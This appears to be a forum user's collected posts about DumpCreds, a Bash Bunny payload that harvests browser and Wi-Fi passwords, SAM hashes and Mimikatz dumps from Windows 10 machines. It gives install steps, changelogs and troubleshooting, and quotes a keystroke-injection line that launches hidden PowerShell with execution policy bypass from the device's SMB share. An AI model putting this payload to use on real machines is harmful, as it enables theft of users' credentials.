Posts posted by qdba
Hi Sebkinne,
Nice, can't wait for 1.2.
I think the idea with a payload timeout is not so bad. With a special LED state we know whether it makes sense to wait for a payload to finish or not.
-
15 hours ago, b0N3z said:
why doesn't it save the loot to the loot directory but instead to the payload folder that it runs from? Is this for a faster payload or to get rid of storage mode during the payload?
Please go to DEBUG mode (create a file named DEBUG in the payload folder) and look at the file /loot/DumpCred_2.1/log.txt
If there is no log.txt, take a look at /tmp/log.txt. If there is something like "bunny.service timeout" or "bunny.service failed" you probably ran into a timeout. This is a Bunny issue in firmware 1.1 and will be solved in FW 1.2
Look there .....
-
Hi,
copy all the *.json files to the language folder of the Bunny flash storage. After that, boot into arming mode. During boot all language files will be copied to an internal folder. I think it was /usr/local/lib/language. (At the moment I have no Bunny to look at.)
-
You are right. It's to get rid of the storage mode. I don't know any company which allows USB storage; the USB ports are mostly blocked.
So I store the loot in the payload folder and copy it during cleanup to the /loot folder.
-
For Responder you don't need any deb files. Copy the Responder folder from the Tools_Installer payload to <flash_root>\tools and reboot the Bunny in arming mode.
During reboot the Bunny moves the files to /tools (<root_of_bunny_linux>/tools, previously known as /pentest). You only need a deb file if you have some post- or preinstall scripts running after or before copying the files.
-
DumpCreds_2.1 New Version
Changelog
- Complete new payload.txt code for BashBunny 1.1
- Added a lot of debug code into the payload. For debugging create a file "DEBUG" in the payload folder. You get the debug log in \loot\Dumpcreds_2.1
- Impacket.deb included for easy impacket installation
- Some Ducky languages included (from DuckyInstall payload)
-
DumpCreds 2.1
- Author: QDBA
- Version: Version 2.1.0 Build 1004
- Target: Windows 10
Description
** works only on Bash Bunny with FW 1.1 **
Dumps the usernames & plaintext passwords from
- Browsers (Chrome, IE, Firefox)
- Wifi
- SAM Hashes (only if AdminMode=True)
- Mimimk@tz Dump (only if AdminMode=True)
- Computer information (hardware info, Windows ProductKey, hotfixes, software, local and AD user list)
without
- Use of USB storage (because USB storage is mostly blocked by USBGuard or DriveLock)
- Internet connection (because the firewall content filter blocks the download sites)
Problems
- If you use the payload on a computer for the first time, it will take some time and several tries until the drivers are successfully loaded.
- If the payload doesn't work (red LED, or yellow LED blinks 2 or 4 times), unplug the BB and try once more (can take 3 or 4 tries).
- If the payload stops working while the yellow LED blinks very fast for longer than 2 min and you get no white LED, you ran into a timeout. From the moment you plug in the BB every payload has 1 min 30 s to do its job. At 1 min 30 s every payload stops. (That's a FW 1.1 issue)
Debug
If you want some debug information, create a file named "DEBUG" in the payload folder; you get the debug information in \loot\DumpCred_2.1\log.txt
Configuration
None needed.
Requirements
impacket - install it from https://github.com/qdba/MyBashBunny/tree/master/tools
Download
https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds
Install
- Put Bash Bunny in arming mode
- Copy all folders into the root of the Bunny flash drive
  Mandatory:
  * payloads/library/DumpCreds_2.1 --> the payload files
  * payloads/library/DumpCreds_2.1/PS --> the PowerShell scripts for the payload
  * tools --> impacket tools (provide smbserver.py) (not necessary if already installed)
  Not necessary:
  * docs --> this doc file
  * languages --> language files for DUCKY_LANG
- Eject Bash Bunny safely!!
- Insert Bash Bunny in arming mode (Impacket and languages will be installed)
- Copy all files and folders of the payload from payloads/library/DumpCreds_2.1 to payloads/switch1 or payloads/switch2
- Eject Bash Bunny safely
- Move the switch to the right position
- Plug in Bash Bunny and have fun....! :-)
STATUS
LED                     Status
Magenta solid           Setup
Red slow blink          Impacket not found
Red fast blink          Target did not acquire IP address
Yellow single blink     Initialization
Yellow double blink     HID stage
Yellow triple blink     Wait for IP coming up
Yellow quad blink       Wait for handshake (SMBServer coming up)
Yellow very fast blink  PowerShell scripts running
White fast blink        Cleanup, copy files to /loot
Green                   Finished
Discussion
https://forums.hak5.org/index.php?/topic/40582-payload-drumpcreds-20-wo-internet-wo-usb-storage
Credits
to......
https://github.com/EmpireProject/Empire Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1, Get-ChromeCreds.ps1
-
Can be a runtime problem. With default settings a payload does not run longer than 1 min 30 s (measured from plugging in the Bunny).
After 1 min 30 s every payload stops working.
Check your /var/log/syslog for an entry like:
bunny.service start operation timed out. Terminating
Failed to start bunny.service
-
I'm still running into the payload timeout after 1 minute.
So I did some investigation about it.
I made the attached payload.txt for testing.
I put the command logger "#### Start Test payload ####" at the beginning of the payload and
logger "#### End Test payload ####" at the end. So I can examine in the syslog what happens during the payload run. After approx. 1:30 min bunny.service runs into a timeout
.........
Apr 6 09:56:52 bunny logger: #### Loop Test payload ####
Apr 6 09:56:54 bunny logger: #### Loop Test payload ####
Apr 6 09:56:56 bunny logger: #### Loop Test payload ####
Apr 6 09:56:58 bunny systemd[1]: bunny.service start operation timed out. Terminating.
Apr 6 09:56:58 bunny systemd[1]: Failed to start bunny.service.
Apr 6 09:56:58 bunny systemd[1]: Unit bunny.service entered failed state.
Apr 6 09:56:58 bunny systemd[1]: Starting Multi-User System.
Apr 6 09:56:58 bunny systemd[1]: Reached target Multi-User System.
Apr 6 09:56:59 bunny systemd[1]: Startup finished in 2.366s (kernel) + 1min 34.343s (userspace) = 1min 36.710s.
The result of the command systemctl show bunny.service | grep Timeout is
TimeoutStartUSec=1min 30s
TimeoutStopUSec=1min 30s
JobTimeoutUSec=0
Guess this is the reason for the payload timeout.
Can anybody confirm this? I will do more investigations
------------------------------------------------------------
OK got it.....
I inserted the value
TimeoutSec=5min
under the [Service] section of the file /lib/systemd/system/bunny.service
Now it works with a timeout of 5 min. (see attached syslog.solved_5min_Timeout) Be careful, I'm not responsible for any damage to the Bunny :-)
@Darren Kitchen @Sebkinne If you agree (because it's part of the firmware) I can make a payload that will patch this.
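The diagnosis in this post rests on two facts: the syslog line "start operation timed out" names the unit systemd terminated, and TimeoutStartUSec from systemctl show gives the limit it was compared against. The following is an added example (not the poster's code, and not part of the Bash Bunny firmware) that automates exactly that check on captured output: it extracts timed-out unit names from a syslog file and converts a systemd time span such as "1min 30s" into seconds so it can be compared with the startup time in the log. The sample log and systemctl output are constructed from the lines quoted above; the unit name and file paths are assumptions for the demo.

```shell
#!/bin/sh
# Added example: find systemd units whose start operation timed out and
# read the configured start timeout in seconds, from captured text files.

# Constructed sample syslog excerpt (same shape as the lines in the post).
SAMPLE_LOG=$(mktemp)
cat >"$SAMPLE_LOG" <<'EOF'
Apr 6 09:56:56 bunny logger: #### Loop Test payload ####
Apr 6 09:56:58 bunny systemd[1]: bunny.service start operation timed out. Terminating.
Apr 6 09:56:58 bunny systemd[1]: Failed to start bunny.service.
Apr 6 09:56:58 bunny systemd[1]: Unit bunny.service entered failed state.
Apr 6 09:56:59 bunny systemd[1]: Startup finished in 2.366s (kernel) + 1min 34.343s (userspace) = 1min 36.710s.
EOF

# Constructed sample of `systemctl show bunny.service | grep Timeout` output.
SAMPLE_SHOW=$(mktemp)
printf 'TimeoutStartUSec=1min 30s\nTimeoutStopUSec=1min 30s\nJobTimeoutUSec=0\n' >"$SAMPLE_SHOW"

# Print each unit name that systemd killed because its start timed out.
# $1 = path to a syslog-style file
timed_out_units() {
    sed -n 's/.*systemd\[[0-9]*\]: \([^ ]*\) start operation timed out.*/\1/p' "$1" | sort -u
}

# Convert a systemd time span such as "1min 30s", "5min" or "90s" to seconds.
# Only the units "min" and "s" are handled, which covers TimeoutStartUSec output.
span_to_seconds() {
    echo "$1" | awk '{
        total = 0
        for (i = 1; i <= NF; i++) {
            if ($i ~ /min$/)    { sub(/min$/, "", $i); total += $i * 60 }
            else if ($i ~ /s$/) { sub(/s$/, "", $i);   total += $i }
        }
        print total
    }'
}

# Read TimeoutStartUSec from captured `systemctl show <unit>` output, in seconds.
# $1 = file holding the systemctl show output
start_timeout_seconds() {
    span=$(sed -n 's/^TimeoutStartUSec=//p' "$1")
    span_to_seconds "$span"
}

echo "units that timed out: $(timed_out_units "$SAMPLE_LOG")"
echo "configured start timeout: $(start_timeout_seconds "$SAMPLE_SHOW") s"
```

On a live system the two inputs would be /var/log/syslog and the output of `systemctl show <unit>`; comparing the configured seconds (90 here) with the userspace startup time in the log (1min 34.343s) shows the unit was terminated right at the limit, which is the conclusion the post draws.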
-
There is an error (or is it a feature).
There is a timeout of approx. 1 min; after this timeout the payload stops.
Run the attached payload and look at /log.txt
The payload stops after a minute
------------------------------------ [Solved] ------------------------------------------------
Look there --- look here :-)
-
Impacket Tools impacket_0.9.15_1.deb
https://github.com/qdba/bashbunny-payloads/tree/version_2.1/payloads/library/DumpCreds_2.1/tools
Put the deb file into the <root>\tools folder - remove Bunny safely - reinsert in arming mode.
It will be installed to /tools/impacket.
-
Searching for language files? Here they are. Exported from DuckInstall
https://github.com/qdba/bashbunny-payloads/tree/version_2.1/payloads/library/DumpCreds_2.1/languages
Put them into the <root>\Language folder - remove Bunny safely - reinsert in arming mode
-
Very nice!! Now let us rewrite some payloads ;-)
-
7 minutes ago, Altao said:
Hi, I use DumpCreds 2.0.2 Build 1003
I tried your delay, still the same problem.
I see -.+.!
wifi-creds.....
and the rest
and at last, very shortly, a red script part, but too short.
Greetings
OK, that helps a lot. So the handshake thing works fine.
Now the error message would be helpful. For very fast vanishing error messages I do a trick: I make a video with the smartphone and step forward slowly until the error message is seen.
-
16 minutes ago, Altao said:
Hi, can you post a working smbserver.py? I tried nearly everything: a firmware reset, your command. The slow purple blink is still the problem.
I can connect to \\172.16.64.1\e
if I run powershell -exec bypass \\172.16.64.1\e\main.ps1 it works
if I do ps -ef | grep smb
root 693 1 3 16:00 ? 00:00:14 python /pentest/impacket/examples/smbserver.py e /root/udisk/payloads/switch2
root 1393 967 0 16:06 pts/0 00:00:00 grep smb
and I have a German keyboard
What is my mistake?
Greetings
Are you using version 2.0.2?
Is there a UAC prompt or a credential prompt? I guess there is a timing problem, so the main.ps1 script will not start.
LED R G
# Wait for Bunny Ethernet and start main.ps1 PowerShell script
Q DELAY 500    # <<<<<<<<<<<<<<<<<< Increase to 1500 for testing
Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\""
Q DELAY 1000
Q ENTER
Does the main.ps1 script fire up right? Can you see the command in the console?
Take care that no other window is open on the screen. Works best on a clean desktop.
-
1 hour ago, Hectortxz said:
I changed the payload for the US and I pinged my IP to 172.16.64.1 and it came back good. It just doesn't pass the slow purple blink.
Can you connect to \\172.16.64.1\e from Explorer?
Is smbserver.py running (ssh to the Bunny and do a ps -ef | grep smb)? If not, see my post above; there is an error in the Impacket installed by tools_installer
-
After a firmware reset this afternoon I ran into trouble with smbserver.py. It didn't start. The purple LED blinks slowly.
After some tests I realized that after running tools_installer the things were installed fine, but smbserver.py had ^M at the end of every line.
I removed it in vi with :1,$s/<CTRL-v><CTRL-M>//g or with the commands
------------------------------------------------
cd /pentest/impacket/examples
cp smbserver.py smbserver.py.sik
sed 's/\r$//' smbserver.py.sik > smbserver.py
-----------------------------------------------------------
Now it works again.
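The failure above is the classic Windows line-ending problem: a script with CRLF endings has "\r" glued to the interpreter name and to every statement, so it silently fails to start. As an added example that is not from the post or the Impacket project, the script below generalises the sed one-liner to any file: it reports whether and how many lines carry a trailing CR, then strips them into a fresh copy while keeping a .sik backup (the post's naming). The CR is embedded via printf so the sed expression does not depend on the non-POSIX "\r" escape. The sample file is constructed inline; its content and name are assumptions for the demo.

```shell
#!/bin/sh
# Added example: detect and strip CRLF line endings from a script file
# before running it, keeping a backup copy.

# Constructed sample: a two-line script written with Windows line endings.
SAMPLE=$(mktemp)
printf 'import sys\r\nprint("hello")\r\n' >"$SAMPLE"

# Return 0 (true) when at least one line of $1 ends with a carriage return.
has_crlf() {
    cr=$(printf '\r')
    grep -q "${cr}\$" "$1"
}

# Print the number of lines in $1 that end with a carriage return (0 if none).
count_crlf() {
    cr=$(printf '\r')
    n=$(grep -c "${cr}\$" "$1") || n=0
    echo "$n"
}

# Strip trailing carriage returns from $1 in place; the original is kept as $1.sik.
strip_crlf() {
    cr=$(printf '\r')
    cp "$1" "$1.sik"
    sed "s/${cr}\$//" "$1.sik" >"$1"
}

# Demo on a working copy so the sample itself stays untouched.
WORK=$(mktemp)
cp "$SAMPLE" "$WORK"
echo "CRLF lines before: $(count_crlf "$WORK")"
strip_crlf "$WORK"
echo "CRLF lines after:  $(count_crlf "$WORK")"
if has_crlf "$WORK"; then
    echo "still has CRLF endings"
else
    echo "clean, backup kept at $WORK.sik"
fi
```

Running `has_crlf` against a freshly installed script is a cheap sanity check to add to an install step; it catches this exact problem before the service that depends on the script fails to start.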
-
3 hours ago, Hectortxz said:
It's a slow blink. I think it's my IP. I set it to 172.16.64.1 and 255.255.255.0 but it'll turn red when I try the payload, but if my computer tries to automatically get the IP it blinks a slow purple for 5 minutes
If you set the IP manually, the var TARGET_IP will not be set by the bunny_helpers.sh script, so the check for a target IP fails and it blinks red. I'm working on an extended version of bunny_helpers.sh. It's not an error of the payload.
If the LED blinks slow purple the payload is waiting for smbserver and the handshake. Is a direct connection with Explorer to \\172.16.64.1\e working?
If yes, does it work when you start the script main.ps1 manually (enter "powershell -exec bypass \\172.16.64.1\e\main.ps1" in a cmd shell)?
Be sure you have the latest files (payload.txt, main.ps1 and the folder PS). There are some timing problems in early versions of payload.txt.
-
9 hours ago, illwill said:
are your Chrome results truncated?
In version 2.0.2 it works. In older versions they are truncated.
-
36 minutes ago, illwill said:
I haven't tested yours, but with chromecreds I had an issue with it truncating the URLs with ... if they were too long. This is how I solved it
Get-ChromeCreds | ft UserURL, Password -AutoSize | Out-File $LOOTDIR\Chrome.txt -width 250
Thank you for the information. But it didn't work for me, because I start every process in its own PowerShell environment with Start-Job. I know there are a lot of other ways. But for me it was the fastest and easiest. :-)
-
New Version 2.0.2
Changelog:
- Parallelize the PowerSploit scripts, so the payload is faster.
- Universal payload. The payload works no matter if there is a UAC prompt or a credentials prompt. There is no kind of exploitation. You will not get admin rights if you didn't have them before. But without admin rights WifiDump, BrowserDump and Computerinformation work fine. Only for Hashdump and M1m1k@tz you need admin rights.
Install:
Copy all files to your switch directory. Don't forget the PS folder.
Download:
See first post
-
3 hours ago, Decoy said:
I think you might need to update the main GitHub link on your original post.
Thanks..... Done.....
-
New Version 2.0.1
Added:
Gather computer information (hardware, software, hotfixes, OS information, OS ProductKey, user list...)
https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0
-
15 hours ago, jafahulo said:
python /pentest/impacket/examples/smbserver.py e $SWITCHDIR &
Yes, that's the original call of the smbserver command. The "nohup python /pentest/impacket/......." was only for debugging in your case.
There are some timing problems in an older payload. I fixed them in a later version. I guess you have an old one, sorry about it.
But anyway, fine that you like the payload.
Filesystem issues
in Bash Bunny
Posted · Edited by qdba
Hello,
at the moment I'm writing an extension which gives some debug information during a payload run.
The function START_DEBUG "tails" /var/log/syslog to /tmp/log.txt (I won't create an extra file because syslog gives a lot more useful information in the background).
During the payload run I can output some information to syslog with logger.
With STOP_DEBUG I stop the "tail" and test if /dev/nandf is mounted. If so I copy /tmp/log.txt to /root/udisk/loot. If not I mount /dev/nandf to /root/udisk, copy the file, do a sync and unmount /dev/nandf.
Now the problem: it happens often that when I look in the loot folder there is no log file and the FS is corrupted. This happens even if I do a sync; sleep 1; sync after copying the file and before unmounting the FS.
It seems that the FS is not unmounted correctly. Sometimes the dirty bit is set.
Has anybody any idea?
payload.txt
debug.sh